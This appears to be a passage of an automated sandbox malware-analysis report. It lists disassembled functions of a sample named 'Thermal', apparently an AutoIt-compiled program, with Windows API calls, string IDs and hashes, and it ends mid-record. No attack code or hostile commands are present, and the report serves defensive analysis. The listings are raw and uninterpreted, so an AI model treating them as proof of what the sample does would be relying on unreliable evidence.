                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: BuffCharUpper
                                                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                • API String ID: 3964851224-909552448
                                                • Opcode ID: 5cd73889340b5fb4cde9c877915ea369c93ef823c12a26150ee9abecf4892f88
                                                • Instruction ID: 979b01e3bbd853ef8f58cb239cc7fede9774296427fadf3a3ae9b0249ad4a577
                                                • Opcode Fuzzy Hash: 5cd73889340b5fb4cde9c877915ea369c93ef823c12a26150ee9abecf4892f88
                                                • Instruction Fuzzy Hash: FA41F97065026ECBDF04EFA0E855AFA3724FF51300FA04455EE5297252DB38AD69CBA1
                                                APIs
                                                  • Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B
                                                  • Part of subcall function 0078153B: _memmove.LIBCMT ref: 007815C4
                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 007D58EB
                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 007D5901
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007D5912
                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 007D5924
                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 007D5935
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: SendString$_memmove
                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                • API String ID: 2279737902-1007645807
                                                • Opcode ID: b2fb4a14913c8d05e820c16f6d5d7a36d89d8baf768ef3bb87c1118271cc6555
                                                • Instruction ID: 199096a11fbfa0c8046d5fce243e909092b75bc7d0437cde58ce0d51898af253
                                                • Opcode Fuzzy Hash: b2fb4a14913c8d05e820c16f6d5d7a36d89d8baf768ef3bb87c1118271cc6555
                                                • Instruction Fuzzy Hash: 41119331591169F9D720F7A1DC5EDBF6BBCFB91B50F80042AB411E22D0DE682945C6A0
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                • String ID: 0.0.0.0
                                                • API String ID: 208665112-3771769585
                                                • Opcode ID: 2031342ca56a4535c2121fd5550b2a6af8bf88f64f203cb020c07c202fb8c57d
                                                • Instruction ID: d037bdbe5b2916617e26b738a6da49efab2da7622937cb65ef62a6583586543b
                                                • Opcode Fuzzy Hash: 2031342ca56a4535c2121fd5550b2a6af8bf88f64f203cb020c07c202fb8c57d
                                                • Instruction Fuzzy Hash: 2E11D231515118BFCB61B764EC4AEEA77BCEF41710F0441A6F04896292EF7999828AA1
                                                APIs
                                                • timeGetTime.WINMM ref: 007D5535
                                                  • Part of subcall function 0079083E: timeGetTime.WINMM(?,00000002,0077C22C), ref: 00790842
                                                • Sleep.KERNEL32(0000000A), ref: 007D5561
                                                • EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 007D5585
                                                • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 007D55A7
                                                • SetActiveWindow.USER32 ref: 007D55C6
                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 007D55D4
                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 007D55F3
                                                • Sleep.KERNEL32(000000FA), ref: 007D55FE
                                                • IsWindow.USER32 ref: 007D560A
                                                • EndDialog.USER32(00000000), ref: 007D561B
                                                Similarity
                                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                • String ID: BUTTON
                                                • API String ID: 1194449130-3405671355
                                                APIs
                                                  • Part of subcall function 00774D37: __itow.LIBCMT ref: 00774D62
                                                  • Part of subcall function 00774D37: __swprintf.LIBCMT ref: 00774DAC
                                                • CoInitialize.OLE32(00000000), ref: 007DDC2D
                                                • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 007DDCC0
                                                • SHGetDesktopFolder.SHELL32(?), ref: 007DDCD4
                                                • CoCreateInstance.OLE32(00803D4C,00000000,00000001,0082B86C,?), ref: 007DDD20
                                                • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 007DDD8F
                                                • CoTaskMemFree.OLE32(?,?), ref: 007DDDE7
                                                • _memset.LIBCMT ref: 007DDE24
                                                • SHBrowseForFolderW.SHELL32(?), ref: 007DDE60
                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 007DDE83
                                                • CoTaskMemFree.OLE32(00000000), ref: 007DDE8A
                                                • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 007DDEC1
                                                • CoUninitialize.OLE32(00000001,00000000), ref: 007DDEC3
                                                Similarity
                                                • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                • String ID:
                                                • API String ID: 1246142700-0
                                                APIs
                                                • GetKeyboardState.USER32(?), ref: 007D0896
                                                • SetKeyboardState.USER32(?), ref: 007D0901
                                                • GetAsyncKeyState.USER32(000000A0), ref: 007D0921
                                                • GetKeyState.USER32(000000A0), ref: 007D0938
                                                • GetAsyncKeyState.USER32(000000A1), ref: 007D0967
                                                • GetKeyState.USER32(000000A1), ref: 007D0978
                                                • GetAsyncKeyState.USER32(00000011), ref: 007D09A4
                                                • GetKeyState.USER32(00000011), ref: 007D09B2
                                                • GetAsyncKeyState.USER32(00000012), ref: 007D09DB
                                                • GetKeyState.USER32(00000012), ref: 007D09E9
                                                • GetAsyncKeyState.USER32(0000005B), ref: 007D0A12
                                                • GetKeyState.USER32(0000005B), ref: 007D0A20
                                                Similarity
                                                • API ID: State$Async$Keyboard
                                                • String ID:
                                                • API String ID: 541375521-0
                                                APIs
                                                • GetDlgItem.USER32(?,00000001), ref: 007CCE1C
                                                • GetWindowRect.USER32(00000000,?), ref: 007CCE2E
                                                • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 007CCE8C
                                                • GetDlgItem.USER32(?,00000002), ref: 007CCE97
                                                • GetWindowRect.USER32(00000000,?), ref: 007CCEA9
                                                • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 007CCEFD
                                                • GetDlgItem.USER32(?,000003E9), ref: 007CCF0B
                                                • GetWindowRect.USER32(00000000,?), ref: 007CCF1C
                                                • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 007CCF5F
                                                • GetDlgItem.USER32(?,000003EA), ref: 007CCF6D
                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 007CCF8A
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 007CCF97
                                                Similarity
                                                • API ID: Window$ItemMoveRect$Invalidate
                                                • String ID:
                                                • API String ID: 3096461208-0
                                                APIs
                                                  • Part of subcall function 00771F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00772412,?,00000000,?,?,?,?,00771AA7,00000000,?), ref: 00771F76
                                                • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 007724AF
                                                • KillTimer.USER32(-00000001,?,?,?,?,00771AA7,00000000,?,?,00771EBE,?,?), ref: 0077254A
                                                • DestroyAcceleratorTable.USER32(00000000), ref: 007ABFE7
                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00771AA7,00000000,?,?,00771EBE,?,?), ref: 007AC018
                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00771AA7,00000000,?,?,00771EBE,?,?), ref: 007AC02F
                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00771AA7,00000000,?,?,00771EBE,?,?), ref: 007AC04B
                                                • DeleteObject.GDI32(00000000), ref: 007AC05D
                                                Similarity
                                                • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                • String ID:
                                                • API String ID: 641708696-0
                                                APIs
                                                  • Part of subcall function 007729AB: GetWindowLongW.USER32(?,000000EB), ref: 007729BC
                                                • GetSysColor.USER32(0000000F), ref: 007725AF
                                                Similarity
                                                • API ID: ColorLongWindow
                                                • String ID:
                                                • API String ID: 259745315-0
                                                APIs
                                                  • Part of subcall function 00790B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00782A3E,?,00008000), ref: 00790BA7
                                                  • Part of subcall function 00790284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00782A58,?,00008000), ref: 007902A4
                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00782ADF
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00782C2C
                                                  • Part of subcall function 00783EBE: _wcscpy.LIBCMT ref: 00783EF6
                                                  • Part of subcall function 0079386D: _iswctype.LIBCMT ref: 00793875
                                                Similarity
                                                • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                • API String ID: 537147316-3738523708
                                                APIs
                                                • CharLowerBuffW.USER32(?,?,00800980), ref: 007DAF4E
                                                • GetDriveTypeW.KERNEL32(00000061,0082B5F0,00000061), ref: 007DB018
                                                • _wcscpy.LIBCMT ref: 007DB042
                                                Similarity
                                                • API ID: BuffCharDriveLowerType_wcscpy
                                                • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                • API String ID: 2820617543-1000479233
                                                APIs
                                                Similarity
                                                • API ID: __i64tow__itow__swprintf
                                                • String ID: %.15g$0x%p$False$True
                                                • API String ID: 421087845-2263619337
                                                APIs
                                                • _memset.LIBCMT ref: 007F778F
                                                • CreateMenu.USER32 ref: 007F77AA
                                                • SetMenu.USER32(?,00000000), ref: 007F77B9
                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007F7846
                                                • IsMenu.USER32(?), ref: 007F785C
                                                • CreatePopupMenu.USER32 ref: 007F7866
                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007F7893
                                                • DrawMenuBar.USER32 ref: 007F789B
                                                Similarity
                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                • String ID: 0$F
                                                • API String ID: 176399719-3044882817
                                                APIs
                                                • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 007F7B83
                                                • CreateCompatibleDC.GDI32(00000000), ref: 007F7B8A
                                                • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 007F7B9D
                                                • SelectObject.GDI32(00000000,00000000), ref: 007F7BA5
                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 007F7BB0
                                                • DeleteDC.GDI32(00000000), ref: 007F7BB9
                                                • GetWindowLongW.USER32(?,000000EC), ref: 007F7BC3
                                                • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 007F7BD7
                                                • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 007F7BE3
                                                Similarity
                                                • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                • String ID: static
                                                • API String ID: 2559357485-2160076837
                                                • Opcode ID: a215cfb798b8ef10b62c7178518c5c810577c2ea2340deab8e16f01e4fd30de4
                                                • Instruction ID: 76c249524833553c62c1e9abc6d50fcc9076b0416dea84c603e095a1d989e9ec
                                                • Opcode Fuzzy Hash: a215cfb798b8ef10b62c7178518c5c810577c2ea2340deab8e16f01e4fd30de4
                                                • Instruction Fuzzy Hash: DC318D72104219AFDF159F64DC49FEB3B69FF0A320F110215FA65A22A0CB39D821DFA0
                                                APIs
                                                • _memset.LIBCMT ref: 0079706B
                                                  • Part of subcall function 00798D58: __getptd_noexit.LIBCMT ref: 00798D58
                                                • __gmtime64_s.LIBCMT ref: 00797104
                                                • __gmtime64_s.LIBCMT ref: 0079713A
                                                • __gmtime64_s.LIBCMT ref: 00797157
                                                • __allrem.LIBCMT ref: 007971AD
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007971C9
                                                • __allrem.LIBCMT ref: 007971E0
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007971FE
                                                • __allrem.LIBCMT ref: 00797215
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00797233
                                                • __invoke_watson.LIBCMT ref: 007972A4
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                • String ID:
                                                • API String ID: 384356119-0
                                                • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                • Instruction ID: d56ffec24a5b46b2d32a5b15fd797d6c77ce4b7e26f7564e8041e8fa8b87022e
                                                • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                • Instruction Fuzzy Hash: 54710671A14706EBDB189F7DEC46B6AB3B9BF81320F14422AF514E7281E778DA00C790
                                                APIs
                                                • _memset.LIBCMT ref: 007D2CE9
                                                • GetMenuItemInfoW.USER32(00837890,000000FF,00000000,00000030), ref: 007D2D4A
                                                • SetMenuItemInfoW.USER32(00837890,00000004,00000000,00000030), ref: 007D2D80
                                                • Sleep.KERNEL32(000001F4), ref: 007D2D92
                                                • GetMenuItemCount.USER32(?), ref: 007D2DD6
                                                • GetMenuItemID.USER32(?,00000000), ref: 007D2DF2
                                                • GetMenuItemID.USER32(?,-00000001), ref: 007D2E1C
                                                • GetMenuItemID.USER32(?,?), ref: 007D2E61
                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007D2EA7
                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007D2EBB
                                                • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007D2EDC
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                • String ID:
                                                • API String ID: 4176008265-0
                                                • Opcode ID: 37f87131d8f8c936f42cf2dbdb04e6fdef1351d3469f285b7ebbfd5cdaf95441
                                                • Instruction ID: 43c4fd2e697c085e75633bca962331bd9350d0e81cc07e2e65b58243ab11e9c1
                                                • Opcode Fuzzy Hash: 37f87131d8f8c936f42cf2dbdb04e6fdef1351d3469f285b7ebbfd5cdaf95441
                                                • Instruction Fuzzy Hash: 2B619EB0A00249AFDB21DF64CD88ABEBBB9FB50304F14045AF841A7352D739AD07DB21
                                                APIs
                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 007F75CA
                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 007F75CD
                                                • GetWindowLongW.USER32(?,000000F0), ref: 007F75F1
                                                • _memset.LIBCMT ref: 007F7602
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007F7614
                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 007F768C
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessageSend$LongWindow_memset
                                                • String ID:
                                                • API String ID: 830647256-0
                                                • Opcode ID: 282a1f37d4f972f4070d161b185a5fe01db75f7457b60d9a54afb59aded9132b
                                                • Instruction ID: ee08c96061a6ad169752113fdd0781ef5cd262a24be447221a50085855a2c592
                                                • Opcode Fuzzy Hash: 282a1f37d4f972f4070d161b185a5fe01db75f7457b60d9a54afb59aded9132b
                                                • Instruction Fuzzy Hash: 23616975904208AFDB20DFA8CC85EFE77B8EB49710F1001A9FA15A73A1D774AE51DB60
                                                APIs
                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 007C77DD
                                                • SafeArrayAllocData.OLEAUT32(?), ref: 007C7836
                                                • VariantInit.OLEAUT32(?), ref: 007C7848
                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 007C7868
                                                • VariantCopy.OLEAUT32(?,?), ref: 007C78BB
                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 007C78CF
                                                • VariantClear.OLEAUT32(?), ref: 007C78E4
                                                • SafeArrayDestroyData.OLEAUT32(?), ref: 007C78F1
                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007C78FA
                                                • VariantClear.OLEAUT32(?), ref: 007C790C
                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007C7917
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                • String ID:
                                                • API String ID: 2706829360-0
                                                • Opcode ID: 3526f6e26fdb0acbbc155ece02fa6120f5871bebb549f6fcf883e6f53b5135b3
                                                • Instruction ID: e786ac427cf10498b319620510601d2857bb019a2485adec3b638b5c167dca47
                                                • Opcode Fuzzy Hash: 3526f6e26fdb0acbbc155ece02fa6120f5871bebb549f6fcf883e6f53b5135b3
                                                • Instruction Fuzzy Hash: 9B414235A04219DFCF14DFA4D888EADBBB9FF48354F00806DEA55A7261CB34A945CFA4
                                                APIs
                                                • GetKeyboardState.USER32(?), ref: 007D0530
                                                • GetAsyncKeyState.USER32(000000A0), ref: 007D05B1
                                                • GetKeyState.USER32(000000A0), ref: 007D05CC
                                                • GetAsyncKeyState.USER32(000000A1), ref: 007D05E6
                                                • GetKeyState.USER32(000000A1), ref: 007D05FB
                                                • GetAsyncKeyState.USER32(00000011), ref: 007D0613
                                                • GetKeyState.USER32(00000011), ref: 007D0625
                                                • GetAsyncKeyState.USER32(00000012), ref: 007D063D
                                                • GetKeyState.USER32(00000012), ref: 007D064F
                                                • GetAsyncKeyState.USER32(0000005B), ref: 007D0667
                                                • GetKeyState.USER32(0000005B), ref: 007D0679
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: State$Async$Keyboard
                                                • String ID:
                                                • API String ID: 541375521-0
                                                • Opcode ID: 4b76b592c6679f431dc3596f756be8cd16a6a0a490a4f7f1a1401cd997b94ef1
                                                • Instruction ID: d589e712306399073522d1aac5ced109870c8b987b37c22b9ffb9f72223165ac
                                                • Opcode Fuzzy Hash: 4b76b592c6679f431dc3596f756be8cd16a6a0a490a4f7f1a1401cd997b94ef1
                                                • Instruction Fuzzy Hash: 2541C4345047CA6DFF708A6498047B5BEB06B51304F08619BD9C6577C2EAACD9E8CFE2
                                                APIs
                                                  • Part of subcall function 00774D37: __itow.LIBCMT ref: 00774D62
                                                  • Part of subcall function 00774D37: __swprintf.LIBCMT ref: 00774DAC
                                                • CoInitialize.OLE32 ref: 007E8AED
                                                • CoUninitialize.OLE32 ref: 007E8AF8
                                                • CoCreateInstance.OLE32(?,00000000,00000017,00803BBC,?), ref: 007E8B58
                                                • IIDFromString.OLE32(?,?), ref: 007E8BCB
                                                • VariantInit.OLEAUT32(?), ref: 007E8C65
                                                • VariantClear.OLEAUT32(?), ref: 007E8CC6
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                • API String ID: 834269672-1287834457
                                                • Opcode ID: c66ce1c5aed6241b10424f1c17f06e077054ef8cbf7e24df04a76cfafc069106
                                                • Instruction ID: 9284c0239852e51d819c4afa08d894dc41f729b47dcd85d4937b814aea90f3fd
                                                • Opcode Fuzzy Hash: c66ce1c5aed6241b10424f1c17f06e077054ef8cbf7e24df04a76cfafc069106
                                                • Instruction Fuzzy Hash: E461AAB0206751DFC750DF11C888B6AB7E8BF49714F104859F9899B2A1CB78ED44CBA3
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 007DBB13
                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 007DBB89
                                                • GetLastError.KERNEL32 ref: 007DBB93
                                                • SetErrorMode.KERNEL32(00000000,READY), ref: 007DBC00
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                • API String ID: 4194297153-14809454
                                                • Opcode ID: f74043443feb7082579cb3b4c68fd7a1229ad53b29f4d3daa73304467240b657
                                                • Instruction ID: b61998826151320a30230ac1b7af2affcaec6c57cdc21fc95ea4597566a5919f
                                                • Opcode Fuzzy Hash: f74043443feb7082579cb3b4c68fd7a1229ad53b29f4d3daa73304467240b657
                                                • Instruction Fuzzy Hash: 4E31AF75A00209EFCB10EF64C849EA9B7B8FF44300F55806BE806E7395DB789941CB90
                                                APIs
                                                  • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                  • Part of subcall function 007CB79A: GetClassNameW.USER32(?,?,000000FF), ref: 007CB7BD
                                                • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 007C9BCC
                                                • GetDlgCtrlID.USER32 ref: 007C9BD7
                                                • GetParent.USER32 ref: 007C9BF3
                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 007C9BF6
                                                • GetDlgCtrlID.USER32(?), ref: 007C9BFF
                                                • GetParent.USER32(?), ref: 007C9C1B
                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 007C9C1E
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 1536045017-1403004172
                                                • Opcode ID: 3b1858b6664ca1b3c3e989c102020d4dc7e1c9de3efc7c2f3912b489dcde0d72
                                                • Instruction ID: 777f8d99eb0f50a9f262169d886de38a5838effd227dbe0c07db4158f062618e
